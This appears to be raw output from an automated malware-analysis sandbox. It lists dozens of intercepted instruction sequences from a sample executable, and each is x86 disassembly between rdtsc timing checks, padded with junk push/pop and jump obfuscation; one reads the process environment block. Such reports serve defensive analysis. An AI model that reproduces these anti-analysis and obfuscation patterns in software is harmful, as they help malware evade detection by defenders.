Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ECAC second address: 114ED63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC7292A9B10h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FC7292A9B12h 0x00000012 pop edi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FC7292A9B08h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e add ebx, dword ptr [ebp+122D17E9h] 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov ebx, dword ptr [ebp+122D2BB7h] 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007FC7292A9B08h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 0000001Bh 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 mov eax, dword ptr [ebp+122D00F9h] 0x00000068 jo 00007FC7292A9B06h 0x0000006e push FFFFFFFFh 0x00000070 sub ebx, dword ptr [ebp+122D2E6Fh] 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 push ebx 0x0000007a jmp 00007FC7292A9B10h 0x0000007f pop ebx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ED63 second address: 114ED7A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC728ECBE0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1155D22 second address: 1155D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a movsx edi, dx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FC7292A9B08h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xor bl, 00000000h 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e jo 00007FC7292A9B08h 0x00000034 push esi 0x00000035 pop esi 0x00000036 pushad 0x00000037 jmp 00007FC7292A9B15h 0x0000003c push eax 0x0000003d pop eax 0x0000003e popad 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FC7292A9B0Ah 0x00000048 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ED7A second address: 114ED88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1155D84 second address: 1155D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1153DDD second address: 1153DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 115E115 second address: 115E148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 push edi 0x00000008 jmp 00007FC7292A9B0Eh 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 ja 00007FC7292A9B1Ah 0x00000018 jc 00007FC7292A9B0Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11661C0 second address: 11661DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11661DA second address: 11661DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F4056 second address: 10F405C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F405C second address: 10F4066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F4066 second address: 10F4070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F4070 second address: 10F4076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A58C second address: 116A5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC728ECBE11h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5A5 second address: 116A5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FC7292A9B0Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5B8 second address: 116A5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE13h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5D1 second address: 116A5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5D5 second address: 116A5DF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC728ECBE06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116AFAC second address: 116AFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1170B64 second address: 1170B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FC728ECBE06h 0x0000000d jmp 00007FC728ECBE0Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1170B7C second address: 1170B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F5AF second address: 116F5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC728ECBE08h 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F5C1 second address: 116F5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F6EA second address: 116F6F4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC728ECBE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F6F4 second address: 116F73A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7292A9B16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 jng 00007FC7292A9B20h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F87E second address: 116F882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F882 second address: 116F891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F891 second address: 116F8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FC728ECBE06h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116FB2E second address: 116FB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FC7292A9B11h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116FB48 second address: 116FB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC728ECBE0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116FB5B second address: 116FB93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Dh 0x00000007 jnc 00007FC7292A9B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FC7292A9B13h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10E9FAB second address: 10E9FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10E9FB1 second address: 10E9FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC7292A9B06h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FC7292A9B12h 0x00000012 jp 00007FC7292A9B16h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10E9FE9 second address: 10E9FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709A8 second address: 11709BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B10h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709BE second address: 11709EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FC728ECBE06h 0x00000014 jmp 00007FC728ECBE0Ch 0x00000019 popad 0x0000001a push esi 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709EB second address: 11709F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709F0 second address: 1170A0C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC728ECBE16h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F902A second address: 10F902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114252B second address: 114254B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114254B second address: 1142555 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142555 second address: 11425BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FC728ECBE06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FC728ECBE08h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FC728ECBE0Dh 0x0000002c call 00007FC728ECBE0Dh 0x00000031 stc 0x00000032 pop edx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jo 00007FC728ECBE06h 0x0000003d jmp 00007FC728ECBE10h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11425BD second address: 11425E5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7292A9B15h 0x00000008 jmp 00007FC7292A9B0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FC7292A9B0Ch 0x00000018 jnp 00007FC7292A9B06h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11426DC second address: 1142700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d je 00007FC728ECBE18h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142700 second address: 1142721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007FC7292A9B0Bh 0x00000012 pop ebx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142943 second address: 1142948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142948 second address: 114295D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114295D second address: 1142961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E2EC second address: 130E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E2F7 second address: 130E2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E2FF second address: 130E33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B17h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jnp 00007FC7292A9B0Ch 0x00000012 push dword ptr [ebp+122D24A3h] 0x00000018 mov dx, cx 0x0000001b push 7E2A931Ah 0x00000020 push ebx 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0008 second address: 72A000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A000E second address: 72A0060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC7292A9B0Ah 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov cx, bx 0x0000001d pushfd 0x0000001e jmp 00007FC7292A9B19h 0x00000023 sbb ah, FFFFFFC6h 0x00000026 jmp 00007FC7292A9B11h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0060 second address: 72A0066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0066 second address: 72A0084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7292A9B12h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0084 second address: 72A00DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 mov bx, cx 0x00000013 mov bh, al 0x00000015 popad 0x00000016 sub esp, 18h 0x00000019 pushad 0x0000001a call 00007FC728ECBE19h 0x0000001f pop edx 0x00000020 mov bx, ax 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC728ECBE15h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A00DA second address: 72A00FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7292A9B0Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A00FE second address: 72A013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c jmp 00007FC728ECBE15h 0x00000011 mov bh, ch 0x00000013 popad 0x00000014 mov ebx, dword ptr [eax+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC728ECBE16h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A013D second address: 72A0143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0143 second address: 72A0147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0147 second address: 72A016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7292A9B0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A016A second address: 72A017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A017A second address: 72A01EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC7292A9B0Fh 0x00000013 or eax, 703A99FEh 0x00000019 jmp 00007FC7292A9B19h 0x0000001e popfd 0x0000001f jmp 00007FC7292A9B10h 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, bx 0x0000002c jmp 00007FC7292A9B19h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A01EF second address: 72A022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ah, 38h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [762C06ECh] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dx, si 0x00000017 pushfd 0x00000018 jmp 00007FC728ECBE18h 0x0000001d xor ah, FFFFFFE8h 0x00000020 jmp 00007FC728ECBE0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A022F second address: 72A0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0235 second address: 72A0284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b call 00007FC728ECBE0Dh 0x00000010 pushfd 0x00000011 jmp 00007FC728ECBE10h 0x00000016 and cx, 6A78h 0x0000001b jmp 00007FC728ECBE0Bh 0x00000020 popfd 0x00000021 pop eax 0x00000022 mov cl, dl 0x00000024 popad 0x00000025 jne 00007FC728ECCCFDh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dl, BDh 0x00000030 mov esi, 448FCDB5h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0284 second address: 72A02D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7292A9B11h 0x00000009 sub eax, 36DBDDC6h 0x0000000f jmp 00007FC7292A9B11h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b jmp 00007FC7292A9B0Ch 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC7292A9B0Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A02D4 second address: 72A033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE11h 0x00000009 xor ecx, 4207C086h 0x0000000f jmp 00007FC728ECBE11h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC728ECBE10h 0x0000001b or cl, 00000028h 0x0000001e jmp 00007FC728ECBE0Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC728ECBE15h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A033C second address: 72A03BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [76290B60h] 0x00000011 mov eax, 75A0E5E0h 0x00000016 ret 0x00000017 pushad 0x00000018 jmp 00007FC7292A9B10h 0x0000001d mov ch, B6h 0x0000001f popad 0x00000020 push 00000044h 0x00000022 jmp 00007FC7292A9B0Dh 0x00000027 pop edi 0x00000028 jmp 00007FC7292A9B0Eh 0x0000002d xchg eax, edi 0x0000002e pushad 0x0000002f mov esi, 503F921Dh 0x00000034 movzx ecx, bx 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007FC7292A9B14h 0x0000003e xchg eax, edi 0x0000003f jmp 00007FC7292A9B10h 0x00000044 push dword ptr [eax] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 movsx edx, ax 0x0000004c push ecx 0x0000004d pop edi 0x0000004e popad 0x0000004f rdtsc
